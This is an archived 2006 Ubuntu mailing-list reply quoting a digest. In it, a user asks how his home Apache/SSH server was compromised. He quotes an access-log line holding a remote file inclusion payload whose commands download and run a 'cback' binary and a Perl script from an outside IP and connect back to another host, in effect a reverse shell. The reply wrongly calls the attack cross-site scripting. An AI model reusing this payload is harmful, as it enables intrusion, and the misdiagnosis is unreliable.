My home desktop was compromised, but how?

Scott sdamron at gmail.com
Tue Feb 28 21:50:40 UTC 2006


It is a cross site scripting thing.  Someone is bouncing off of you in
order to gain access to someone else, unless your IP Address is the
start or finish one, then you have been owned.  However, you may have
PHP installed on your system, but not using it, and it needs updated!!

On 2/28/06, ubuntu-users-request at lists.ubuntu.com
<ubuntu-users-request at lists.ubuntu.com> wrote:
> Send ubuntu-users mailing list submissions to
>        ubuntu-users at lists.ubuntu.com
>
> To subscribe or unsubscribe via the World Wide Web, visit
>        https://lists.ubuntu.com/mailman/listinfo/ubuntu-users
> or, via email, send a message with subject or body 'help' to
>        ubuntu-users-request at lists.ubuntu.com
>
> You can reach the person managing the list at
>        ubuntu-users-owner at lists.ubuntu.com
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of ubuntu-users digest..."
>
>
> Today's Topics:
>
>   1. Re: can't open hda1 icon on desktop (alex)
>   2. Re: Routing Problem (?? Wei-Yee Chan)
>   3. Re: can't open hda1 icon on desktop (Max Andersen)
>   4. Re: can't open hda1 icon on desktop (Lo?c Martin)
>   5. My home desktop was compromised, but how? (Carthik Sharma)
>   6. Re: [Dapper] How to get mounted disk show on the desktop
>      (Guido Heumann)
>   7. Re: XFCE4 Install under Dapper (paul cooke)
>   8. gcj compile issues (Roy Britten)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Tue, 28 Feb 2006 14:31:27 -0500
> From: alex <radsky at ncia.net>
> Subject: Re: can't open hda1 icon on desktop
> To: Ubuntu Help and User Discussions <ubuntu-users at lists.ubuntu.com>
> Message-ID: <4404A50F.5070509 at ncia.net>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> alex wrote:
>
> > I downloaded a NTFS file with ubuntu and it is currently in /home.
> > I'd like to put in the Windows XP in hda1.
> > There's a hda1 icon on the ubuntu desktop but its permissions are
> > currently 400 and greyed out so
> > I can't write to it.  I tried chmod 660 but it has no effect.
> >
> > How can I get that NTFS file into hda1 without doing it in Windows?
> >
> > alex
> >
> Problem solved....... Too much of a hastle  doing it in ubuntu so  I
> downloaded it  with Windows XP
>
> I was hoping to do all my internet work with ubuntu but apparently there
> are still some limitations. .
>
> Thanks for the responses.
> alex
>
>
>
> ------------------------------
>
> Message: 2
> Date: Wed, 01 Mar 2006 03:32:22 +0800
> From: ?? Wei-Yee Chan <survivor at brisnet.org>
> Subject: Re: Routing Problem
> To: Ubuntu Help and User Discussions <ubuntu-users at lists.ubuntu.com>
> Message-ID: <4404A546.7040405 at brisnet.org>
> Content-Type: text/plain; charset=UTF-8
>
> Have U tried asking Fred?  He's using Suse, so he might know.
>
> DC Parris wrote:
> > Greetings,
> >
> > My primary box, running SUSE Linux 10.0 is doubling as my router.  I can get
> > my laptop running SUSE 10.0 to connect to the Internet through this primary
> > box.  However, I have not been able to successfully connect to the Internet
> > from an Ubuntu 5.10 box on my LAN.  Running a single distro environment is
> > not feasible for my situation, but at least there are no Windows boxes.
> > Anyway, here's my basic info.
> >
> > The primary box has two NICs, one connects to Roadrunner via DHCP, and the
> > internal NIC provides DHCP service to the internal LAN.  The Ubuntu box is
> > getting it's IP address from the SUSE box just fine.  It even lists the SUSE
> > box as its name server.  Yet, it doesn't see the external NIC.
> >
> > When I ping the external NIC, I get a "network unreachable" message.  When I
> > first installed Ubuntu, I had no need to share the connection, and did not
> > configure a default route.  I believe that is where the problem lies, but am
> > not sure what to do about it.  Any help is greatly appreciated.
> >
> > Regards,
> > Don
>
>
>
>
> ------------------------------
>
> Message: 3
> Date: Tue, 28 Feb 2006 20:39:56 +0100
> From: Max Andersen <max at militant.dk>
> Subject: Re: can't open hda1 icon on desktop
> To: Ubuntu Help and User Discussions <ubuntu-users at lists.ubuntu.com>
> Message-ID: <4404A70C.7000608 at militant.dk>
> Content-Type: text/plain; charset="iso-8859-1"
>
> alex wrote:
> > alex wrote:
> >
> >> I downloaded a NTFS file with ubuntu and it is currently in /home.
> >> I'd like to put in the Windows XP in hda1.
> >> There's a hda1 icon on the ubuntu desktop but its permissions are
> >> currently 400 and greyed out so
> >> I can't write to it.  I tried chmod 660 but it has no effect.
> >>
> >> How can I get that NTFS file into hda1 without doing it in Windows?
> >>
> >> alex
> >>
> > Problem solved....... Too much of a hastle  doing it in ubuntu so  I
> > downloaded it  with Windows XP
> >
> > I was hoping to do all my internet work with ubuntu but apparently
> > there are still some limitations. .
> >
>
> The limitation is your ntfs..... and a file is not ntfs. the filesystem
> is ntfs. Big difference. But if this simple problem scared you of, it's
> a wise choice leaving ubuntu. Because larger problems than that arise
> when using open source against closed source.
>
> Sincerely
> Max
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: smime.p7s
> Type: application/x-pkcs7-signature
> Size: 3414 bytes
> Desc: S/MIME Cryptographic Signature
> Url : https://lists.ubuntu.com/archives/ubuntu-users/attachments/20060228/ee4b394e/smime-0001.bin
>
> ------------------------------
>
> Message: 4
> Date: Tue, 28 Feb 2006 20:54:57 +0100
> From: Lo?c Martin <lomartin3 at gmail.com>
> Subject: Re: can't open hda1 icon on desktop
> To: Ubuntu Help and User Discussions <ubuntu-users at lists.ubuntu.com>
> Message-ID: <4404AA91.8080002 at gmail.com>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> Max Andersen a écrit :
>
> > alex wrote:
> >
> >> Problem solved....... Too much of a hastle  doing it in ubuntu so  I
> >> downloaded it  with Windows XP
> >>
> >> I was hoping to do all my internet work with ubuntu but apparently
> >> there are still some limitations. .
> >>
> >
> > The limitation is your ntfs..... and a file is not ntfs. the
> > filesystem is ntfs. Big difference. But if this simple problem scared
> > you of, it's a wise choice leaving ubuntu. Because larger problems
> > than that arise when using open source against closed source.
> >
> > Sincerely
> > Max
>
> That's neither really nice nor true. The fact Alex prefers to use XP
> *atm* for *this task* doesn't make it any wiser to leave Ubuntu. In
> fact, he never stated he was going to do it. Keeping XP for a while just
> for the few tasks he still doesn't know how to do on Linux while
> *keeping* Ubuntu for all the tasks that are unwise to do on XP
> (especially for beginners) seems the wisest choice.
> Cheers,
>
>
>
> ------------------------------
>
> Message: 5
> Date: Tue, 28 Feb 2006 15:44:21 -0500
> From: "Carthik Sharma" <carthik at gmail.com>
> Subject: My home desktop was compromised, but how?
> To: "Ubuntu Help and User Discussions" <ubuntu-users at lists.ubuntu.com>
> Message-ID:
>        <80f75db0602281244t9cd3e22m8759ad81a2b9d967 at mail.gmail.com>
> Content-Type: text/plain; charset=UTF-8
>
> Hi,
>
> I run an apache, ssh server from my home computer. I have not
> installed any php scripts whatsoever. All there are are text files,
> and the odd html file.
>
> Somebody seems to have hacked into my desktop/server. I find files in
> the /tmp/ (like "agent.8213)directory which I cannot open, these are
> setuid-ed -- how do I open these?
>
> In my apache access logs, there are things like
> "http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|"
>
> That above is a valid url, and will take you to a script to deface
> someone's php script etc, I suppose. Now, how did this malicious
> hacker get in my computer?
>
> (The full line is :
> 192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
> /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
> HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"  )
> How would I go about tracing how this incident happened?
>
> Any server/security admins here that can help me with a little
> patience? I really want to get to the root of this and find out why
> whatever happened happened.
>
> None of the passwords for the ssh accounts are dictionary words, in
> fact all are combinations of letters, numbers and sometimes special
> symbols.
>
> I have done nothing special to modify apache, or the ssh daemon, in
> fact, sshd listens on port 8888.
>
> I could paste logs here, but they would be too long. For now, I have
> stopped the apache and ssh servers.
>
> Any help will be most welcome. My security bubble just burst :(
>
> Carthik.
>
> ------------------------------
>
> Message: 6
> Date: Tue, 28 Feb 2006 22:03:47 +0100
> From: Guido Heumann <listguido at web.de>
> Subject: Re: [Dapper] How to get mounted disk show on the desktop
> To: Ubuntu Help and User Discussions <ubuntu-users at lists.ubuntu.com>
> Message-ID: <200602282203.48044.listguido at web.de>
> Content-Type: text/plain;  charset="utf-8"
>
> Am Montag, 27. Februar 2006 19:20 schrieb Vincent Trouilliez:
> [...]
> > In my experience, it won't take effect immediately though,
> > even restarting Nautilus wasn't enough, even logging out wasn't enough,
> > I had to reboot the machine, somehow.
>
> Hi Vince,
>
> a little hint for future experiments with GNOME configuration settings:
> there's at least one more thing you can do before rebooting, if logging out
> doesn't help: restarting GDM. From the login screen, switch to the console
> with ctrl-alt-F1 and then sudo /etc/init.d/gdm restart.
>
> Just in case you didn't know. In my experience this sometimes saves me a
> desperate reboot.
>
> Greetings,
> Guido
>
>
>
>
> ------------------------------
>
> Message: 7
> Date: Tue, 28 Feb 2006 21:10:49 +0000
> From: paul cooke <paul.cooke100 at blueyonder.co.uk>
> Subject: Re: XFCE4 Install under Dapper
> To: Ubuntu Help and User Discussions <ubuntu-users at lists.ubuntu.com>
> Message-ID: <200602282110.49413.paul.cooke100 at blueyonder.co.uk>
> Content-Type: text/plain;  charset="iso-8859-1"
>
> On Monday 27 February 2006 12:40, Jani Monoses wrote:
> > > Actually, XFCE4 is a meta package that will install enough components to
> > > have a XFCE4 desktop, as mentioned though, XFCE4 is not in its prime
> > > right now.
> >
> > xfce4 is no longer recommended, use xubuntu-desktop instead. Although
> > for those wishing to use xfce4 without the rest of xubuntu apps I guess
> > the former metapackage will need to be updated to reflect the current
> > changes.
> >
>
> what are you on about?
>
> xfce4 as a metapackage is great if you don't want the rest of your ubuntu
> being messed up by installing xubuntu-desktop.
>
> For one thing, it doesn't mess up your spashscreen shown while loading.
>
> for another,  you don't get the whole shebang of the rest of xfce4 being
> installed.
>
> And another, it makes it a heck of a lot easier to upgrade or remove...
>
> I, for one, prefer far smaller meta-packages.
>
> xubuntu-desktop is what you use when you're ONLY having xfce on top of the
> core...
>
> > Jani
>
>
>
> ------------------------------
>
> Message: 8
> Date: Wed, 1 Mar 2006 10:30:14 +1300
> From: "Roy Britten" <roy.britten at gmail.com>
> Subject: gcj compile issues
> To: ubuntu-users at lists.ubuntu.com
> Message-ID: <ea7284a10602281330v7f8baeb3x at mail.gmail.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi,
>
> I have plans to compile (under Ubuntu) Java programs to native MS Windows
> executables. I have installed mingw32, mingw32-binutils and mingw32-runtime
> as well as gcj, gcj-4.0, gcj-4.0-base, java-gcj-compat, libgcj6,
> libgcj6-awt, libgcj6-common, and libgcj-common. I'm using the sun JVM. I'm
> running Ubuntu 5.10.
>
> I can compile a windows binary using the MingW32 gcc, and a Java class file
> using gcj. I haven't found a good howto for creating a Windows binary from
> Java code under Linux. I suspect that there's some classpath issues or some
> such to be sorted. Can someone who has done this before point me to the
> solution?
>
> Thanks,
> Roy.
>
> $ uname -a
> Linux smallgreybox 2.6.12-10-686 #1 Mon Feb 13 12:18:37 UTC 2006 i686
> GNU/Linux
> $ java -version
> java version "1.5.0_06"
> Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_06-b05)
> Java HotSpot(TM) Client VM (build 1.5.0_06-b05, mixed mode, sharing)
> $ i586-mingw32msvc-gcc -o hello.exe hello.c # successfully creates windows
> binary from C code
> $ gcj -C Hello.java # successfully creates class file from Java code
> $ gcj --main=Hello -o Hello.exe Hello.java
> gcj: libgcj.spec: No such file or directory
> $ gcj -v
> Using built-in specs.
> Reading specs from libgcj.spec
> gcj: libgcj.spec: No such file or directory
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL: https://lists.ubuntu.com/archives/ubuntu-users/attachments/20060301/b8fab60d/attachment.htm
>
> ------------------------------
>
> --
> ubuntu-users mailing list
> ubuntu-users at lists.ubuntu.com
> https://lists.ubuntu.com/mailman/listinfo/ubuntu-users
>
>
> End of ubuntu-users Digest, Vol 18, Issue 294
> *********************************************
>


--
-------------------------------
When all you have is a hammer, everything starts to look like a nail.
Registered Linux User #409723




More information about the ubuntu-users mailing list